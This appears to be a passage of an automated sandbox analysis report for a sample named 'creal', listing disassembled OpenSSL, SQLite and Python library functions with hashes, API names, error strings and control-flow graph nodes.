                                                                                                                                                                                                                • API ID: O_malloc$O_freeR_newR_set_debug
                                                                                                                                                                                                                • String ID: ..\s\ssl\record\ssl3_buffer.c$ssl3_setup_read_buffer$ssl3_setup_write_buffer
                                                                                                                                                                                                                • API String ID: 2137838121-2302522825
                                                                                                                                                                                                                • Opcode ID: 3ed476757c16f9c518a80d7b86d6f942c3d03468d456452f37b9b146c2e16dcf
                                                                                                                                                                                                                • Instruction ID: d0bf3de0167f771ad32442fb3ed657f6197b577288357c28db1dd43952cc31d5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ed476757c16f9c518a80d7b86d6f942c3d03468d456452f37b9b146c2e16dcf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C51AB72A08B4281FB109BA5E8847AD73A5FB94BD8F554435EE6E43785DF3DD481C301
                                                                                                                                                                                                                Function 00007FF8E68C9060 Relevance: 14.0, APIs: 6, Strings: 3, Instructions: 517COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                                                • String ID: -journal$immutable$nolock
                                                                                                                                                                                                                • API String ID: 438689982-4201244970
                                                                                                                                                                                                                • Opcode ID: 83e2a97fa00efd0c27a9592cdce843648313d1d97cf6ab97798199b00e65efce
                                                                                                                                                                                                                • Instruction ID: 3bb1af8bdead2ae44b3483db251a5a3d6b9182ebd1aa4e832faad07f8fd33418
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83e2a97fa00efd0c27a9592cdce843648313d1d97cf6ab97798199b00e65efce
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1932B962B29B9296EB648FA5944037937A0FF49BE4F084275CA6E07BD5DF3CE454C302
                                                                                                                                                                                                                Function 00007FF8E692B060 Relevance: 12.4, APIs: 1, Strings: 7, Instructions: 397COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$API call with %s database connection pointer$NULL$invalid$misuse$unopened
                                                                                                                                                                                                                • API String ID: 3510742995-3762325461
                                                                                                                                                                                                                • Opcode ID: bdd65c06e807f738dd2697ad4d27a94250175461887e5150d1e454e4e0986083
                                                                                                                                                                                                                • Instruction ID: de65a605681499fddcbce7f893fd64d8bd953304a4ab0bf12390c1206c22629c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bdd65c06e807f738dd2697ad4d27a94250175461887e5150d1e454e4e0986083
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7902CE62A2DB4685EB64AF91A49837AA7E4FF94BC8F180031DE4D07799DF3DE4458302
                                                                                                                                                                                                                Function 00007FF8E6932BB0 Relevance: 9.4, APIs: 3, Strings: 3, Instructions: 374COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                                                • String ID: database schema is locked: %s$out of memory$statement too long
                                                                                                                                                                                                                • API String ID: 438689982-1046679716
                                                                                                                                                                                                                • Opcode ID: 5ed36e81426d4dda266e1e2b72bbbc4cce9bbd62fb343d6ed1371e91b3143b91
                                                                                                                                                                                                                • Instruction ID: f48419b3491528f62c45ffedc18fdd06f60287a0038f3bbfe36c0a4715895464
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ed36e81426d4dda266e1e2b72bbbc4cce9bbd62fb343d6ed1371e91b3143b91
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59F18022A687C286FB24EBB194483BA67A0FF95BC8F184135DA4D07795DF7CE581C702
                                                                                                                                                                                                                Function 00007FF8E68D1630 Relevance: 5.1, APIs: 2, Strings: 1, Instructions: 593stringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpystrcmp
                                                                                                                                                                                                                • String ID: :memory:
                                                                                                                                                                                                                • API String ID: 4075415522-2920599690
                                                                                                                                                                                                                • Opcode ID: caaa475f843e1cf8634484f57e8112b8d208c1787e0867ca2710ba94a12e65cc
                                                                                                                                                                                                                • Instruction ID: cc0944ab23a1d85ffabb75a765a0b7cf64c68e8b268e61859a1f5d0d9e0988d8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: caaa475f843e1cf8634484f57e8112b8d208c1787e0867ca2710ba94a12e65cc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6427C62F2DB9282EB648FA5A45837927A4FF49BC4F044135DA8D43B95DF3CE494C312
                                                                                                                                                                                                                Function 00007FF8E68C1490 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InfoSystem
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 31276548-0
                                                                                                                                                                                                                • Opcode ID: 92d82e4b214818c158f58746d604a038a40c5e57c576eefab9a689c2dc8594a3
                                                                                                                                                                                                                • Instruction ID: 3de59616408dd5004597d7a6a1022fab9b6699f0eae1722f612c77e8623113c1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92d82e4b214818c158f58746d604a038a40c5e57c576eefab9a689c2dc8594a3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2FA1F664F2EB1691FE988BD5E89933422A1BF4ABC4F140535CA9E473A1DF7CE4919303
                                                                                                                                                                                                                Function 00007FF8E7004660 Relevance: 151.1, APIs: 76, Strings: 10, Instructions: 584threadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1578819031.00007FF8E7001000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF8E7000000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578774051.00007FF8E7000000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578860238.00007FF8E700F000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578915505.00007FF8E7019000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578958590.00007FF8E701B000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7000000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Eval_Thread$RestoreSave$DeallocErr_$sqlite3_reset$Iter_Object_OccurredStringTuple_$FromIterList_LongNextThread_get_thread_identsqlite3_stepsqlite3_stmt_busy$AppendCheckFormatLong_ModuleModule_PackSizeStateType_Unicode_Vectorcallsqlite3_changessqlite3_column_countsqlite3_column_namesqlite3_finalizesqlite3_get_autocommitsqlite3_last_insert_rowidsqlite3_prepare_v2sqlite3_stmt_readonly
                                                                                                                                                                                                                • String ID: BEGIN $Base Connection.__init__ not called.$Base Cursor.__init__ not called.$Cannot operate on a closed cursor.$Cannot operate on a closed database.$Error while building row_cast_map$Recursive use of cursors not allowed.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.$e$executemany() can only execute DML statements.
                                                                                                                                                                                                                • API String ID: 3905713625-3920904728
                                                                                                                                                                                                                • Opcode ID: ddcf874027f5f25215195d8631cc8c42a410216cb0c3c7f23cc6a095149d7a8c
                                                                                                                                                                                                                • Instruction ID: 6c31a5aa7acdb9ca6a0cec97aeb43b24e160076b285d0cff8f408f2e8e848d59
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ddcf874027f5f25215195d8631cc8c42a410216cb0c3c7f23cc6a095149d7a8c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A522935A09A4281EE549FA5E45437E23A0FF47BF5F140831EA2E876A4DF7CE846D306
                                                                                                                                                                                                                Function 00007FF8E71439D0 Relevance: 73.8, APIs: 30, Strings: 12, Instructions: 293stringmemoryCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 252 7ff8e71439d0-7ff8e71439f4 253 7ff8e7143a08-7ff8e7143a1a 252->253 254 7ff8e71439f6-7ff8e7143a01 252->254 255 7ff8e7143b8b-7ff8e7143b9f PyUnicode_FromString 253->255 256 7ff8e7143a20-7ff8e7143a2e call 7ff8e7141060 253->256 254->253 257 7ff8e7143d0c-7ff8e7143d0f 255->257 258 7ff8e7143ba5-7ff8e7143bba PyType_GenericAlloc 255->258 267 7ff8e7143a39-7ff8e7143a4b _PyType_CalculateMetaclass 256->267 268 7ff8e7143a30-7ff8e7143a35 256->268 262 7ff8e7143d11-7ff8e7143d14 257->262 263 7ff8e7143d25-7ff8e7143d28 257->263 258->257 260 7ff8e7143bc0-7ff8e7143bc9 258->260 266 7ff8e7143bd0-7ff8e7143c21 260->266 262->263 269 7ff8e7143d16-7ff8e7143d1a 262->269 264 7ff8e7143d2a-7ff8e7143d2e 263->264 265 7ff8e7143d3f 263->265 264->265 271 7ff8e7143d30-7ff8e7143d34 264->271 272 7ff8e7143d41-7ff8e7143d5d 265->272 266->266 273 7ff8e7143c23-7ff8e7143c2c 266->273 267->257 275 7ff8e7143a51-7ff8e7143a58 267->275 268->267 274 7ff8e7143a37 268->274 269->263 270 7ff8e7143d1c-7ff8e7143d1f _Py_Dealloc 269->270 270->263 271->265 277 7ff8e7143d36-7ff8e7143d39 _Py_Dealloc 271->277 278 7ff8e7143c49-7ff8e7143c4c 273->278 279 7ff8e7143c2e-7ff8e7143c43 PyObject_SetAttrString 273->279 274->267 275->255 276 7ff8e7143a5e-7ff8e7143a74 PyObject_GetAttrString 275->276 280 7ff8e7143a81-7ff8e7143a96 PyUnicode_CompareWithASCIIString 276->280 281 7ff8e7143a76-7ff8e7143a7c PyErr_Clear 276->281 277->265 282 7ff8e7143c4e-7ff8e7143c5e 278->282 283 7ff8e7143c62-7ff8e7143c6f 278->283 279->278 284 7ff8e7143cf8-7ff8e7143cfb 279->284 287 7ff8e7143ada-7ff8e7143aec PyUnicode_CompareWithASCIIString 280->287 288 7ff8e7143a98-7ff8e7143aad strcmp 280->288 289 7ff8e7143b6f-7ff8e7143b86 PyErr_SetString 281->289 282->283 291 7ff8e7143c60 282->291 285 7ff8e7143c71 283->285 286 7ff8e7143c74-7ff8e7143c92 PyType_Ready 283->286 284->257 290 7ff8e7143cfd-7ff8e7143d01 284->290 285->286 286->284 292 7ff8e7143c94-7ff8e7143c9a 286->292 295 7ff8e7143aee-7ff8e7143b00 call 7ff8e7154735 287->295 296 7ff8e7143b07-7ff8e7143b19 PyUnicode_CompareWithASCIIString 287->296 293 7ff8e7143aaf-7ff8e7143ac0 strcmp 288->293 294 7ff8e7143ad5-7ff8e7143ad8 288->294 289->257 290->257 297 7ff8e7143d03-7ff8e7143d06 _Py_Dealloc 290->297 291->283 298 7ff8e7143c9f-7ff8e7143cb9 PyObject_GetAttrString 292->298 299 7ff8e7143c9c 292->299 293->294 300 7ff8e7143ac2-7ff8e7143ad3 strcmp 293->300 301 7ff8e7143b56-7ff8e7143b59 294->301 295->296 313 7ff8e7143b02-7ff8e7143b05 295->313 296->301 303 7ff8e7143b1b-7ff8e7143b28 296->303 297->257 306 7ff8e7143cbf-7ff8e7143ccc PyObject_IsTrue 298->306 307 7ff8e7143d62 PyErr_Clear 298->307 299->298 300->287 300->294 304 7ff8e7143b5b-7ff8e7143b5f 301->304 305 7ff8e7143b6a-7ff8e7143b6d 301->305 309 7ff8e7143b30-7ff8e7143b40 303->309 304->305 310 7ff8e7143b61-7ff8e7143b64 _Py_Dealloc 304->310 305->255 305->289 311 7ff8e7143cce-7ff8e7143cd2 306->311 312 7ff8e7143cdd-7ff8e7143cdf 306->312 314 7ff8e7143d68-7ff8e7143d7f PyObject_SetAttrString 307->314 315 7ff8e7143b48-7ff8e7143b53 309->315 316 7ff8e7143b42-7ff8e7143b46 309->316 310->305 311->312 317 7ff8e7143cd4-7ff8e7143cd7 _Py_Dealloc 311->317 318 7ff8e7143d5e 312->318 319 7ff8e7143ce1-7ff8e7143cf2 PyErr_SetString 312->319 313->301 314->284 320 7ff8e7143d85-7ff8e7143dad _PyObject_FastCall 314->320 315->301 316->309 316->315 317->312 318->284 321 7ff8e7143d60 318->321 319->284 320->284 322 7ff8e7143db3-7ff8e7143dc8 _PyObject_GetAttrId 320->322 321->314 323 7ff8e7143dca-7ff8e7143dce 322->323 324 7ff8e7143dd9-7ff8e7143ddc 322->324 323->324 326 7ff8e7143dd0-7ff8e7143dd3 _Py_Dealloc 323->326 324->284 325 7ff8e7143de2-7ff8e7143df9 PyObject_VectorcallDict 324->325 327 7ff8e7143e0b-7ff8e7143e0e 325->327 328 7ff8e7143dfb-7ff8e7143e00 325->328 326->324 327->284 330 7ff8e7143e14-7ff8e7143e16 327->330 328->327 329 7ff8e7143e02-7ff8e7143e05 _Py_Dealloc 328->329 329->327 331 7ff8e7143e18-7ff8e7143e1c 330->331 332 7ff8e7143e27-7ff8e7143e2a 330->332 331->332 333 7ff8e7143e1e-7ff8e7143e21 _Py_Dealloc 331->333 332->272 333->332
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: String$DeallocObject_$Attr$Err_Unicode_$CompareType_Withstrcmp$Clear$AllocCalculateCallDictFastFromGenericMetaclassReadyTrueVectorcall
                                                                                                                                                                                                                • String ID: ABCMeta$GenericMeta$TypingMeta$_ProtocolMeta$__module__$__orig_bases__$__slots__$abc$mypyc classes can't have __slots__$mypyc classes can't have a metaclass$typing$typing_extensions
                                                                                                                                                                                                                • API String ID: 3039355408-3015203947
                                                                                                                                                                                                                • Opcode ID: 581e7a51ebe161312cd1d03399a5527e61c6b6fd9e8a3dc5876b46a657a736b2
                                                                                                                                                                                                                • Instruction ID: a71f59b3aced35d9b1ce26ffa01573653eb9f473249a9917391ab6e191926e45
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 581e7a51ebe161312cd1d03399a5527e61c6b6fd9e8a3dc5876b46a657a736b2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2DD16A32A09B86C2EA588FA9E95437C73A1BF49BD4F448035CE2E66255EF3CF145D302
                                                                                                                                                                                                                Function 00007FF8E7005B60 Relevance: 59.7, APIs: 23, Strings: 11, Instructions: 192threadCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 613 7ff8e7005b60-7ff8e7005b7d 614 7ff8e7005b7f-7ff8e7005b88 PyThread_get_thread_ident 613->614 615 7ff8e7005b8e-7ff8e7005b92 613->615 614->615 616 7ff8e700d200-7ff8e700d222 PyThread_get_thread_ident PyErr_Format 614->616 617 7ff8e700d227-7ff8e700d248 PyType_GetModuleByDef PyModule_GetState 615->617 618 7ff8e7005b98-7ff8e7005b9d 615->618 619 7ff8e7005d9b-7ff8e7005d9d 616->619 620 7ff8e7005ba3-7ff8e7005ba6 618->620 621 7ff8e7005f41-7ff8e7005f50 PyErr_SetString 618->621 624 7ff8e7005d40-7ff8e7005d50 619->624 622 7ff8e7005e81-7ff8e7005e93 _PyArg_NoKeywords 620->622 623 7ff8e7005bac-7ff8e7005bc3 _PyArg_ParseTuple_SizeT 620->623 621->616 622->623 626 7ff8e7005e99 622->626 623->619 625 7ff8e7005bc9-7ff8e7005be3 PyUnicode_AsUTF8AndSize 623->625 625->619 627 7ff8e7005be9-7ff8e7005c0e sqlite3_limit 625->627 626->619 628 7ff8e7005ee4-7ff8e7005ef8 PyErr_SetString 627->628 629 7ff8e7005c14-7ff8e7005c1b 627->629 628->619 629->629 630 7ff8e7005c1d-7ff8e7005c20 629->630 631 7ff8e7005c26-7ff8e7005c62 PyEval_SaveThread sqlite3_prepare_v2 PyEval_RestoreThread 630->631 632 7ff8e7005e68-7ff8e7005e7c PyErr_SetString 630->632 633 7ff8e7005d90-7ff8e7005d96 call 7ff8e70058d0 631->633 634 7ff8e7005c68-7ff8e7005c79 631->634 632->619 633->619 635 7ff8e7005da0-7ff8e7005da6 634->635 636 7ff8e7005c7f-7ff8e7005c86 634->636 640 7ff8e7005db8-7ff8e7005dbe 635->640 641 7ff8e7005da8-7ff8e7005db1 635->641 638 7ff8e7005d0c-7ff8e7005d1f _PyObject_GC_New 636->638 639 7ff8e7005c8c-7ff8e7005c92 636->639 647 7ff8e7005d25-7ff8e7005d3d PyObject_GC_Track 638->647 648 7ff8e7005e1e-7ff8e7005e2e sqlite3_finalize 638->648 645 7ff8e7005d51-7ff8e7005d57 639->645 646 7ff8e7005c98-7ff8e7005cb0 _strnicmp 639->646 642 7ff8e7005dc0-7ff8e7005dd4 640->642 643 7ff8e7005e0a-7ff8e7005e18 PyErr_SetString 640->643 641->635 644 7ff8e7005db3 641->644 642->643 643->648 645->646 651 7ff8e7005d5d-7ff8e7005d70 645->651 649 7ff8e7005d86-7ff8e7005d8b 646->649 650 7ff8e7005cb6-7ff8e7005cce _strnicmp 646->650 647->624 648->624 649->638 650->649 652 7ff8e7005cd4-7ff8e7005cec _strnicmp 650->652 651->649 652->649 653 7ff8e7005cf2-7ff8e7005d0a _strnicmp 652->653 653->638 653->649
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1578819031.00007FF8E7001000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF8E7000000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578774051.00007FF8E7000000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578860238.00007FF8E700F000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578915505.00007FF8E7019000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578958590.00007FF8E701B000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7000000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _strnicmp$Eval_Object_SizeThreadThread_get_thread_ident$Arg_Err_FormatParseRestoreSaveTrackTuple_Unicode_sqlite3_limitsqlite3_prepare_v2
                                                                                                                                                                                                                • String ID: Base Connection.__init__ not called.$Cannot operate on a closed database.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.$You can only execute one statement at a time.$delete$insert$query string is too large$replace$sqlite3.Connection$the query contains a null character$update
                                                                                                                                                                                                                • API String ID: 603912194-3639599724
                                                                                                                                                                                                                • Opcode ID: 4fd8ca26ecb050e427ed40bdb856c4ce243b6fc914df62382e35d1afdce9c31c
                                                                                                                                                                                                                • Instruction ID: 5d960d4c6badf2fa55231549963150aa0bd7fdcaa48783d8186a07745fa5b5b4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4fd8ca26ecb050e427ed40bdb856c4ce243b6fc914df62382e35d1afdce9c31c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56815F21A0CA4285EF648BA1E858B7D2361BF46BE4F444832D96EC76A4DF2CE545E302
                                                                                                                                                                                                                Function 00007FF8E7006350 Relevance: 44.0, APIs: 22, Strings: 3, Instructions: 233threadCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 704 7ff8e7006350-7ff8e7006398 PySys_Audit 705 7ff8e70066a4-7ff8e70066a9 704->705 706 7ff8e700639e-7ff8e70063ae PyUnicode_FSConverter 704->706 707 7ff8e7006647-7ff8e700666a 705->707 706->705 708 7ff8e70063b4-7ff8e70063bb 706->708 709 7ff8e70063c1-7ff8e70063ff PyEval_SaveThread sqlite3_open_v2 708->709 710 7ff8e70066ab-7ff8e70066c6 call 7ff8e7004290 708->710 711 7ff8e7006401-7ff8e7006415 sqlite3_busy_timeout 709->711 712 7ff8e700641b-7ff8e700642c PyEval_RestoreThread 709->712 710->709 727 7ff8e70066cc 710->727 711->712 714 7ff8e700642e-7ff8e7006432 712->714 715 7ff8e700643a-7ff8e7006442 712->715 714->715 716 7ff8e7006434 _Py_Dealloc 714->716 717 7ff8e700d28e-7ff8e700d291 715->717 718 7ff8e7006448-7ff8e7006467 PyType_GetModuleByDef PyModule_GetState 715->718 716->715 717->718 720 7ff8e700d297-7ff8e700d29e PyErr_NoMemory 717->720 721 7ff8e7006686-7ff8e7006691 call 7ff8e70058d0 718->721 722 7ff8e700646d-7ff8e7006487 PyLong_FromLong 718->722 720->705 724 7ff8e7006696-7ff8e700669e sqlite3_close 721->724 722->724 725 7ff8e700648d-7ff8e70064b7 PyObject_Vectorcall 722->725 724->705 728 7ff8e70064bd-7ff8e70064c0 725->728 729 7ff8e700d2a3-7ff8e700d2a7 725->729 727->705 728->724 731 7ff8e70064c6-7ff8e70064e5 PyObject_Vectorcall 728->731 729->728 730 7ff8e700d2ad-7ff8e700d2b4 _Py_Dealloc 729->730 730->728 732 7ff8e70064e7-7ff8e70064eb 731->732 733 7ff8e70064f6-7ff8e70064f9 731->733 732->733 734 7ff8e70064ed-7ff8e70064f0 _Py_Dealloc 732->734 733->724 735 7ff8e70064ff-7ff8e700650d PyList_New 733->735 734->733 736 7ff8e700d2b9-7ff8e700d2bc 735->736 737 7ff8e7006513-7ff8e7006521 PyList_New 735->737 736->724 738 7ff8e700d2c2-7ff8e700d2c6 736->738 739 7ff8e7006527-7ff8e7006582 PyThread_get_thread_ident 737->739 740 7ff8e700d2db-7ff8e700d2de 737->740 738->724 741 7ff8e700d2cc 738->741 744 7ff8e700d307 739->744 745 7ff8e7006588-7ff8e7006598 739->745 742 7ff8e700d2ef-7ff8e700d2f2 740->742 743 7ff8e700d2e0-7ff8e700d2e4 740->743 746 7ff8e700d2cf-7ff8e700d2d6 _Py_Dealloc 741->746 742->724 748 7ff8e700d2f8-7ff8e700d2fc 742->748 743->742 747 7ff8e700d2e6-7ff8e700d2e9 _Py_Dealloc 743->747 749 7ff8e700d30e 744->749 745->749 750 7ff8e700659e-7ff8e7006637 PySys_Audit 745->750 746->724 747->742 748->724 751 7ff8e700d302-7ff8e700d305 748->751 750->705 752 7ff8e7006639-7ff8e7006643 750->752 751->746 753 7ff8e7006645 752->753 754 7ff8e700666b-7ff8e7006684 call 7ff8e7003ff0 752->754 753->707 754->707
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1578819031.00007FF8E7001000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF8E7000000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578774051.00007FF8E7000000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578860238.00007FF8E700F000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578915505.00007FF8E7019000.00000004.00000001.01000000.0000001A.sdmpDownload File
